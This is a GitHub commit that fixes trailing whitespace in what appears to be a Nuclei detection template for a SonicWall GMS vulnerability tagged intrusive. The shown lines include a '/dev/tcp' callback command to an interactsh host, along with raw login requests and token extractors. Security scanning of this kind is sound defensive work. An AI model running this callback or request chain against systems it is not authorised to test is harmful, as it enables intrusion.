fix trail space

patch-1
Dhiyaneshwaran 2023-08-28 19:02:13 +05:30 committed by GitHub
parent a1a8e6568b
commit 9427dc14df
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 16 additions and 16 deletions

View File

@ -22,8 +22,8 @@ info:
tags: cve,cve2023,sonicwall,gsm,instrusive
variables:
callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80"
filename: "{{rand_base(5)}}"
callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80"
filename: "{{rand_base(5)}}"
http:
- raw:
@ -37,7 +37,7 @@ http:
- |
GET /appliance/login HTTP/1.1
Host: {{Hostname}}
- |
POST /appliance/applianceMainPage HTTP/1.1
Host: {{Hostname}}
@ -68,17 +68,17 @@ http:
- "dns"
extractors:
- type: json
part: body
internal: true
name: alias
json:
- '.alias'
- type: json
part: body
internal: true
name: alias
json:
- '.alias'
- type: regex
part: body
group: 1
internal: true
name: servertoken
regex:
- "getPwdHash.*,'([0-9]+)'"
- type: regex
part: body
group: 1
internal: true
name: servertoken
regex:
- "getPwdHash.*,'([0-9]+)'"